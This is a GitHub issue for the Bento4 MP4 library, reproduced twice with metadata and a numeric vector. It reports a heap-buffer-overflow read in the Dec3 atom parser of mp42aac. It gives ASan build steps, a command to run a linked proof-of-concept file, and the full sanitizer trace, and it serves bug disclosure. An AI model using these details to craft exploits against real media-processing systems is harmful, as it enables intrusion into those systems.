Hello, A heap-buffer-overflow has occurred when running program mp42aac System info: Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0 Bento4 version 1.6.0-636 [poc.zip](https://github.com/axiomatic-systems/Bento4/files/6629448/poc.zip) Verification steps: 1.Get the source code of Bento4 2.Compile ``` cd Bento4 mkdir check_build && cd check_build cmake ../ -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_CXX_FLAGS="fsanitize=address" make -j 16 ``` 3.run mp42aac ``` ./mp42aac poc /dev/null ``` asan info ``` ==1646778==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000011f at pc 0x55f5c415a3e8 bp 0x7ffe4296a5c0 sp 0x7ffe4296a5b0 READ of size 1 at 0x60200000011f thread T0 #0 0x55f5c415a3e7 in AP4_Dec3Atom::AP4_Dec3Atom(unsigned int, unsigned char const*) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4Dec3Atom.cpp:161 #1 0x55f5c415a71f in AP4_Dec3Atom::Create(unsigned int, AP4_ByteStream&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4Dec3Atom.cpp:56 #2 0x55f5c40d908b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4AtomFactory.cpp:769 #3 0x55f5c40dec9c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4AtomFactory.cpp:234 #4 0x55f5c4133b43 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4ContainerAtom.cpp:194 #5 0x55f5c40549c3 in AP4_SampleEntry::Read(AP4_ByteStream&, AP4_AtomFactory&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4SampleEntry.cpp:115 #6 0x55f5c4061ad8 in AP4_AudioSampleEntry::AP4_AudioSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4SampleEntry.cpp:420 #7 0x55f5c4026e09 in AP4_EncaSampleEntry::AP4_EncaSampleEntry(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4Protection.cpp:74 #8 0x55f5c40d9855 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4AtomFactory.cpp:298 #9 0x55f5c40dec9c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4AtomFactory.cpp:234 #10 0x55f5c406eef7 in AP4_StsdAtom::AP4_StsdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4StsdAtom.cpp:101 #11 0x55f5c406f966 in AP4_StsdAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4StsdAtom.cpp:57 #12 0x55f5c40d9341 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4AtomFactory.cpp:458 #13 0x55f5c40dec9c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4AtomFactory.cpp:234 #14 0x55f5c40e0513 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4AtomFactory.cpp:154 #15 0x55f5c401403e in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4File.cpp:104 #16 0x55f5c4014dda in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4File.cpp:78 #17 0x55f5c4002ef4 in main /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250 #18 0x7f59c140b0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #19 0x55f5c400714d in _start (/home/dh/sda3/AFLplusplus/Bento4-master/mp42aac_afl+++0x5914d) 0x60200000011f is located 0 bytes to the right of 15-byte region [0x602000000110,0x60200000011f) allocated by thread T0 here: #0 0x7f59c1a30b47 in operator new[](unsigned long) (/lib/x86_64-linux-gnu/libasan.so.5+0x10fb47) #1 0x55f5c4011611 in AP4_DataBuffer::AP4_DataBuffer(unsigned int) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4DataBuffer.cpp:55 #2 0x7f59bde0ee00 (<unknown module>) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4Dec3Atom.cpp:161 in AP4_Dec3Atom::AP4_Dec3Atom(unsigned int, unsigned char const*) Shadow bytes around the buggy address: 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff8000: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8010: fa fa 04 fa fa fa fd fa fa fa 01 fa fa fa 00 fa =>0x0c047fff8020: fa fa 00[07]fa fa 00 07 fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1646778==ABORTING ```
A heap-buffer-overflow has occurred when running program mp42aac
https://api.github.com/repos/axiomatic-systems/Bento4/issues/614/comments
0
2021-06-10T09:13:08
2021-07-24T18:31:27Z
https://github.com/axiomatic-systems/Bento4/issues/614
917,109,426
614
false
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : A heap-buffer-overflow has occurred when running program mp42aac Issue date: --- start body --- Hello, A heap-buffer-overflow has occurred when running program mp42aac System info: Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0 Bento4 version 1.6.0-636 [poc.zip](https://github.com/axiomatic-systems/Bento4/files/6629448/poc.zip) Verification steps: 1.Get the source code of Bento4 2.Compile ``` cd Bento4 mkdir check_build && cd check_build cmake ../ -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_CXX_FLAGS="fsanitize=address" make -j 16 ``` 3.run mp42aac ``` ./mp42aac poc /dev/null ``` asan info ``` ==1646778==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000011f at pc 0x55f5c415a3e8 bp 0x7ffe4296a5c0 sp 0x7ffe4296a5b0 READ of size 1 at 0x60200000011f thread T0 #0 0x55f5c415a3e7 in AP4_Dec3Atom::AP4_Dec3Atom(unsigned int, unsigned char const*) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4Dec3Atom.cpp:161 #1 0x55f5c415a71f in AP4_Dec3Atom::Create(unsigned int, AP4_ByteStream&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4Dec3Atom.cpp:56 #2 0x55f5c40d908b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4AtomFactory.cpp:769 #3 0x55f5c40dec9c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4AtomFactory.cpp:234 #4 0x55f5c4133b43 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4ContainerAtom.cpp:194 #5 0x55f5c40549c3 in AP4_SampleEntry::Read(AP4_ByteStream&, AP4_AtomFactory&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4SampleEntry.cpp:115 #6 0x55f5c4061ad8 in AP4_AudioSampleEntry::AP4_AudioSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4SampleEntry.cpp:420 #7 0x55f5c4026e09 in AP4_EncaSampleEntry::AP4_EncaSampleEntry(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4Protection.cpp:74 #8 0x55f5c40d9855 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4AtomFactory.cpp:298 #9 0x55f5c40dec9c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4AtomFactory.cpp:234 #10 0x55f5c406eef7 in AP4_StsdAtom::AP4_StsdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4StsdAtom.cpp:101 #11 0x55f5c406f966 in AP4_StsdAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4StsdAtom.cpp:57 #12 0x55f5c40d9341 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4AtomFactory.cpp:458 #13 0x55f5c40dec9c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4AtomFactory.cpp:234 #14 0x55f5c40e0513 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4AtomFactory.cpp:154 #15 0x55f5c401403e in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4File.cpp:104 #16 0x55f5c4014dda in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4File.cpp:78 #17 0x55f5c4002ef4 in main /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250 #18 0x7f59c140b0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #19 0x55f5c400714d in _start (/home/dh/sda3/AFLplusplus/Bento4-master/mp42aac_afl+++0x5914d) 0x60200000011f is located 0 bytes to the right of 15-byte region [0x602000000110,0x60200000011f) allocated by thread T0 here: #0 0x7f59c1a30b47 in operator new[](unsigned long) (/lib/x86_64-linux-gnu/libasan.so.5+0x10fb47) #1 0x55f5c4011611 in AP4_DataBuffer::AP4_DataBuffer(unsigned int) /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4DataBuffer.cpp:55 #2 0x7f59bde0ee00 (<unknown module>) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/dh/AFLplusplus/Bento4-master/Bento4-master-afl++/Source/C++/Core/Ap4Dec3Atom.cpp:161 in AP4_Dec3Atom::AP4_Dec3Atom(unsigned int, unsigned char const*) Shadow bytes around the buggy address: 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff8000: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8010: fa fa 04 fa fa fa fd fa fa fa 01 fa fa fa 00 fa =>0x0c047fff8020: fa fa 00[07]fa fa 00 07 fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1646778==ABORTING ``` --- end body ---
6,789
[ -0.0352245569229126, 0.0016819649608805776, -0.005385322030633688, -0.012666883878409863, 0.03325246647000313, -0.008525495417416096, -0.05051583796739578, 0.042718496173620224, -0.008479985408484936, 0.036559510976076126, -0.02443874254822731, -0.0032634292729198933, 0.02122271992266178, 0.03081010840833187, 0.021192379295825958, -0.008404136635363102, -0.009026102721691132, 0.01063411496579647, -0.022299783304333687, 0.00584800448268652, 0.024408401921391487, -0.04472092539072037, -0.01774880662560463, 0.04001825302839279, -0.016671743243932724, 0.012181446887552738, -0.007634262554347515, 0.002002429449930787, -0.006287932395935059, 0.006117270793765783, -0.0013719297712668777, 0.015177506022155285, -0.01600426621735096, -0.0005503837019205093, 0.023862285539507866, 0.025439957156777382, 0.03925975412130356, 0.06134716048836708, -0.012500015087425709, 0.014199046418070793, -0.016064945608377457, -0.04951462149620056, -0.036013390868902206, 0.023786436766386032, -0.009617730043828487, 0.014297650195658207, 0.023073449730873108, -0.0016317146364599466, -0.041201505810022354, 0.002286865608766675, 0.025303427129983902, -0.00028751741047017276, -0.029702704399824142, -0.05236656591296196, 0.0049264319241046906, -0.018401114270091057, 0.02022150531411171, 0.02434772253036499, 0.0031572398729622364, -0.00401244405657053, -0.028307072818279266, 0.002960030920803547, 0.026016414165496826, 0.03513353690505028, -0.0005954193766228855, -0.0009263132815249264, -0.0038493673782795668, 0.021328909322619438, -0.013046132400631905, 0.03865296021103859, -0.03176581487059593, -0.02682041935622692, 0.015025806613266468, 0.03586169332265854, 0.014335575513541698, -0.012628959491848946, 0.032160233706235886, 0.014987882226705551, -0.03856194019317627, 0.05846487358212471, -0.04808864742517471, 0.026471512392163277, -0.045782819390296936, 0.03103765845298767, 0.0417172834277153, 0.026835590600967407, -0.05239690840244293, -0.07912630587816238, -0.036438148468732834, -0.03246363252401352, 0.008138662204146385, 0.004262747708708048, 0.027032798156142235, 0.01208284217864275, 0.0063713667914271355, 0.020464222878217697, -0.039047375321388245, -0.022724540904164314, -0.0629248321056366, -0.019174780696630478, -0.0307190902531147, -0.015852566808462143, -0.0055825309827923775, 0.008965423330664635, 0.016626233235001564, -0.0011225740890949965, 0.01178702898323536, -0.03531557694077492, 0.020100144669413567, 0.12172344326972961, -0.0016999793006107211, -0.0037773102521896362, 0.009617730043828487, 0.016747592017054558, 0.002535273088142276, 0.002423394937068224, 0.0008149091736413538, -0.031098337844014168, -0.03865296021103859, -0.02815537340939045, -0.006610292941331863, -0.028868358582258224, -0.014252141118049622, 0.013781873509287834, -0.014866522513329983, 0.040928445756435394, 0.013197830878198147, -0.02507587894797325, -0.031614113599061966, -0.022679030895233154, -0.026744570583105087, -0.0319175124168396, -0.016580723226070404, -0.020646262913942337, -0.007410506252199411, -0.013812213204801083, -0.012075257487595081, 0.03149275481700897, 0.01673242263495922, -0.002795057836920023, -0.05327676236629486, -0.005927646532654762, 0.029323456808924675, 0.0061096856370568275, -0.02301277033984661, -0.001056205714121461, -0.011271251365542412, 0.03516387566924095, -0.013645343482494354, -0.012682054191827774, -0.019053420051932335, -0.007490148302167654, 0.030370181426405907, 0.017263369634747505, 0.03668086975812912, -0.0049378094263374805, 0.00939776562154293, 0.058525554835796356, 0.005480133928358555, -0.016171135008335114, 0.011051286943256855, -0.04839204624295235, 0.032069213688373566, -0.03525489568710327, -0.0018384048016741872, -0.03209955245256424, 0.01765778847038746, 0.004952979274094105, -0.0210861898958683, 0.027442386373877525, -0.001355811720713973, -0.008199342526495457, 0.004133803304284811, 0.026577701792120934, -0.07815543562173843, 0.007107107900083065, 0.015139580704271793, 0.032160233706235886, -0.03099214844405651, 0.0027741992380470037, -0.013015791773796082, 0.015761548653244972, 0.03631678968667984, 0.005772154778242111, 0.02751823700964451, -0.02609226480126381, 0.013781873509287834, -0.06074036285281181, 0.023225149139761925, 0.0047936951741576195, 0.010747889056801796, 0.0007902580546215177, 0.026334982365369797, -0.0189775712788105, 0.01888655126094818, -0.008866818621754646, -0.029293118044734, -0.0075091109611094, 0.005169150419533253, 0.009966637939214706, 0.0030662203207612038, -0.02187502570450306, -0.03731800615787506, 0.010065242648124695, -0.022845901548862457, 0.005719060078263283, -0.0168689526617527, 0.04226339980959892, 0.018901720643043518, -0.007774584461003542, -0.037530384957790375, -0.029869575053453445, 0.005248792469501495, 0.0069212764501571655, -0.010421735234558582, 0.013925987295806408, -0.02971787564456463, 0.027063138782978058, -0.018234245479106903, 0.003619922325015068, 0.007493941113352776, -0.004111048765480518, 0.014138366095721722, -0.03008195385336876, -0.04056436941027641, -0.013652929104864597, -0.01320541650056839, 0.017536427825689316, 0.0017549701733514667, 0.010952683165669441, 0.0319175124168396, 0.015716038644313812, -0.030643239617347717, 0.0011007674038410187, 0.023209979757666588, 0.0036787057761102915, 0.001477171084843576, -0.0015179401962086558, 0.008980592712759972, 0.026941780000925064, -0.02682041935622692, 0.026016414165496826, -0.03552795574069023, -0.026243962347507477, 0.020737281069159508, 0.07281561940908432, -0.006834049243479967, 0.0017198898131027818, -0.0011860982049256563, 0.011521554552018642, 0.007061598356813192, 0.0047936951741576195, 0.016535213217139244, 0.011157477274537086, -0.0002887025475502014, 0.01013350673019886, 0.04681437462568283, -0.01281858328729868, -0.0008518858812749386, -0.0328277088701725, 0.02105584926903248, 0.0071829576045274734, -0.01922028884291649, 0.008912328630685806, 0.007236052304506302, -0.015533998608589172, -0.01421421580016613, -0.009655654430389404, -0.01967538706958294, -0.03428402170538902, 0.03407164290547371, 0.00455097621306777, -0.023831944912672043, -0.0516384094953537, -0.009405351243913174, 0.006318272091448307, 0.017263369634747505, 0.014290065504610538, 0.0034492607228457928, -0.012287636287510395, 0.001609907834790647, 0.022451482713222504, 0.003910047002136707, 0.020509732887148857, -0.0018914995016530156, -0.01419146079570055, 0.027351368218660355, -0.02525791898369789, -0.029975764453411102, -0.0033980621956288815, 0.0061210631392896175, -0.002520103007555008, -0.05652312561869621, 0.00005970193524262868, 0.0003948920057155192, 0.02609226480126381, -0.008449645712971687, 0.0033715148456394672, -0.02155645750463009, -0.0045926934108138084, -0.023543717339634895, -0.015374714508652687, -0.0027571332175284624, 0.018583152443170547, -0.028595300391316414, -0.005062961019575596, -0.024196023121476173, 0.010148677043616772, -0.008214511908590794, -0.005013658665120602, 0.05336778238415718, -0.0436590313911438, -0.02989991381764412, -0.006067968439310789, -0.03695392608642578, -0.013395040296018124, -0.01636834442615509, -0.00057029421441257, -0.03498183935880661, 0.03149275481700897, -0.04660199582576752, 0.01206008717417717, -0.05263962596654892, 0.02233012393116951, 0.003636988578364253, -0.004668543115258217, -0.010095582343637943, 0.02330099791288376, -0.06632289290428162, 0.02525791898369789, 0.002430979860946536, -0.03531557694077492, -0.0072057126089930534, -0.025227578356862068, 0.0015008740592747927, -0.03379858285188675, -0.02756374701857567, 0.0005935231456533074, 0.012295220978558064, 0.011521554552018642, -0.017263369634747505, 0.020206334069371223, -0.009306746535003185, -0.010747889056801796, -0.003944179508835077, -0.0026907646097242832, -0.002664217259734869, -0.014616218395531178, 0.0031231073662638664, 0.013592248782515526, 0.0011017154902219772, 0.041747622191905975, 0.03971485421061516, 0.019796745851635933, 0.004899884574115276, -0.04872578755021095, -0.014403839595615864, -0.008768213912844658, 0.02829190157353878, 0.0035345915239304304, -0.008548250421881676, -0.02305828034877777, -0.0007869396358728409, 0.010975438170135021, 0.011551895178854465, -0.0016667951131239533, 0.0015833604848012328, 0.0045813159085810184, -0.0123103903606534, -0.0027267932891845703, -0.02380160614848137, 0.057797398418188095, -0.009018518030643463, 0.02650185115635395, -0.007505318149924278, -0.026243962347507477, 0.013243340887129307, -0.003963141702115536, -0.04016995057463646, -0.0011472252663224936, -0.03901703655719757, 0.007391544058918953, 0.05804011598229408, -0.05694788321852684, 0.015223016031086445, -0.000286095222691074, -0.00795662309974432, 0.035376254469156265, -0.014957541599869728, -0.014502444304525852, -0.036984268575906754, 0.04839204624295235, -0.02287624031305313, -0.05570394918322563, -0.024180853739380836, 0.022436313331127167, -0.007175372447818518, -0.0049264319241046906, -0.003729904303327203, -0.0694175586104393, 0.021632306277751923, -0.0055256434716284275, 0.028853189200162888, 0.00724363699555397, -0.0020782791543751955, 0.045873839408159256, 0.007201919797807932, -0.010755473747849464, 0.034678440541028976, 0.002135166432708502, 0.033313147723674774, 0.0011358478805050254, -0.02700245939195156, -0.00804764311760664, 0.029930254444479942, 0.030006103217601776, -0.006617878098040819, 0.00990595854818821, -0.015594678930938244, 0.04745151102542877, -0.02636532299220562, 0.014335575513541698, 0.007895943708717823, 0.005984533578157425, 0.02334650792181492, 0.025667505338788033, 0.004236200358718634, 0.012242126278579235, -0.00043945363722741604, -0.029384136199951172, -0.009094367735087872, -0.0009040324948728085, 0.0060755531303584576, 0.015973927453160286, 0.010793399065732956, -0.04508500546216965, -0.016246985644102097, -0.048301029950380325, -0.028231222182512283, -0.0051994905807077885, -0.03489081934094429, 0.03437504172325134, -0.03777310252189636, -0.027169328182935715, -0.01309164147824049, -0.05703890323638916, -0.005411869380623102, -0.00039631419349461794, 0.0124241653829813, -0.015367129817605019, -0.02192053571343422, 0.02641083300113678, -0.004410654306411743, 0.001552072586491704, 0.0072815618477761745, 0.0006632099975831807, -0.00726639200001955, 0.0008134869858622551, 0.02733619697391987, 0.0017037717625498772, -0.008206927217543125, 0.02727551758289337, 0.018006695434451103, -0.01387289259582758, 0.015882907435297966, 0.03370756283402443, 0.0028879737947136164, -0.02126822993159294, 0.009996977634727955, -0.03810684010386467, 0.007270184811204672, 0.004744392819702625, 0.028231222182512283, -0.00030790199525654316, 0.007444638758897781, 0.014874107204377651, 0.00041646172758191824, -0.030840449035167694, -0.018507303670048714, -0.055370211601257324, -0.013690853491425514, -0.022496992722153664, -0.01747574843466282, 0.00983769353479147, 0.010376226156949997, -0.0029088323935866356, -0.012173861265182495, 0.010307961143553257, -0.012507599778473377, 0.0034340908750891685, 0.017293710261583328, -0.010876833461225033, 0.019690556451678276, -0.017126841470599174, 0.023998815566301346, -0.009594975039362907, -0.02380160614848137, -0.008138662204146385, 0.038319218903779984, 0.04062504693865776, 0.000633818272035569, -0.029915083199739456, 0.028140204027295113, -0.011180231347680092, 0.017642617225646973, -0.04068572819232941, -0.04836170747876167, 0.035285234451293945, -0.011953897774219513, -0.01673242263495922, 0.004092086106538773, -0.028504282236099243, 0.008533080108463764, -0.01206008717417717, -0.019842255860567093, -0.03440538048744202, 0.0026035376358777285, -0.021526116877794266, 0.025409618392586708, 0.013759118504822254, -0.007061598356813192, -0.024954520165920258, -0.0021882611326873302, 0.02067660167813301, 0.025182068347930908, 0.010012147948145866, 0.040837425738573074, -0.006250007543712854, 0.038167521357536316, -0.010186601430177689, -0.0034170246217399836, 0.0027267932891845703, -0.012348315678536892, 0.04117116704583168, -0.005351189523935318, 0.008502740412950516, -0.010679624043405056, 0.022481823340058327, -0.002432876033708453, -0.012272465974092484, -0.0079793781042099, 0.05127433314919472, -0.03361654654145241, 0.0052867173217237, -0.05937507003545761, 0.013516399078071117, 0.017490919679403305, 0.004440994467586279, 0.0023437528870999813, 0.01724820025265217, 0.01677793264389038, 0.0022394596599042416, 0.01538230013102293, 0.012196616269648075, 0.00944327563047409, 0.020009126514196396, -0.024590441957116127, 0.012902017682790756, 0.0036521584261208773, 0.030688749626278877, -0.01811288483440876, -0.007095730397850275, 0.010482415556907654, -0.01636834442615509, -0.0061324406415224075, 0.009845278225839138, 0.009208141826093197, 0.03173547610640526, -0.04077674821019173, 0.008904743939638138, 0.00802488811314106, -0.0034587420523166656, 0.03801582008600235, -0.002855737693607807, -0.013326775282621384, 0.019159609451889992, -0.006962993647903204, -0.009496370330452919, -0.022208763286471367, -0.011225741356611252, 0.0283829215914011, -0.01820390485227108, -0.012522770091891289, 0.017460579052567482, 0.02851945161819458, -0.01976640708744526, 0.0016535213217139244, -0.006136232987046242, -0.010004563257098198, -0.017369559034705162, -0.010793399065732956, 0.014737578108906746, -0.017581937834620476, -0.017991526052355766, 0.007175372447818518, -0.009230896830558777, 0.012052502483129501, -0.008919913321733475, 0.020145654678344727, 0.018901720643043518, -0.011931142769753933, 0.026532191783189774, 0.010800983756780624, -0.03956315293908119, -0.013994252309203148, 0.03255464881658554, 0.007213297300040722, -0.006951616145670414, -0.01586773805320263, 0.039502475410699844, 0.013417795300483704, 0.025060709565877914, 0.04205102100968361, 0.010186601430177689, 0.011604989878833294, 0.013395040296018124, 0.03974519297480583, 0.023270659148693085, -0.02169298753142357, 0.008381381630897522, -0.0013994252076372504, -0.05794909596443176, 0.018219074234366417, -0.005229830276221037, 0.016793102025985718, 0.016899291425943375, -0.0051653580740094185, -0.009708749130368233, -0.0059541938826441765, -0.024590441957116127, -0.036468490958213806, 0.04975733906030655, 0.006674765143543482, -0.03740902617573738, -0.01682344265282154, 0.021389588713645935, 0.04851340875029564, -0.012075257487595081, -0.004797487519681454, -0.010330716148018837, 0.009557049721479416, -0.007873188704252243, -0.02824639342725277, -0.001365292933769524, -0.03270635008811951, 0.004896091762930155, 0.006534443236887455, 0.002262214431539178, 0.027988504618406296, 0.012287636287510395, -0.04387141019105911, -0.012317975983023643, 0.0019588160794228315, 0.006413083989173174, 0.02090415172278881, -0.02412017434835434, 0.04490296542644501, 0.05579496920108795, -0.015283695422112942, -0.0234830379486084, -0.036529168486595154, -0.04790661111474037, -0.02155645750463009, 0.0033904772717505693, 0.01281858328729868, -0.009291576221585274, -0.04199033975601196, -0.02246665209531784, 0.02613777294754982, 0.015655359253287315, -0.004740600474178791, -0.02324031852185726, 0.0035838938783854246, 0.031098337844014168, 0.0016468844842165709, -0.020600752905011177, 0.0161863062530756, 0.014396254904568195, -0.014039761386811733, 0.0015454357489943504, -0.0061210631392896175, -0.020160824060440063, -0.008950253017246723, 0.006014873739331961, -0.033859264105558395, -0.0007452223799191415, -0.005047791171818972, -0.0010087997652590275, -0.0010362952016294003, -0.05354982241988182, 0.03076460026204586, -0.01414595078676939, 0.04223306104540825, 0.01705099083483219, -0.005612870678305626, -0.02371058613061905, 0.007232259958982468, -0.018401114270091057, -0.009625314734876156, -0.026334982365369797, -0.008525495417416096, 0.01132434606552124, 0.005791117437183857, -0.016944801434874535, 0.01063411496579647, 0.02595573477447033, -0.00838896632194519, -0.0012581553310155869, 0.010785813443362713, 0.0009775117505341768, -0.022800391539931297, 0.0027836805675178766, -0.022163255140185356, 0.020980000495910645, 0.0030055404640734196, -0.026714229956269264, -0.015549168922007084, 0.013819797895848751, -0.0027495480608195066, 0.0030188143718987703, -0.025091048330068588, -0.020980000495910645, -0.023968474939465523, -0.036620188504457474, -0.018552813678979874, -0.0026054338086396456, 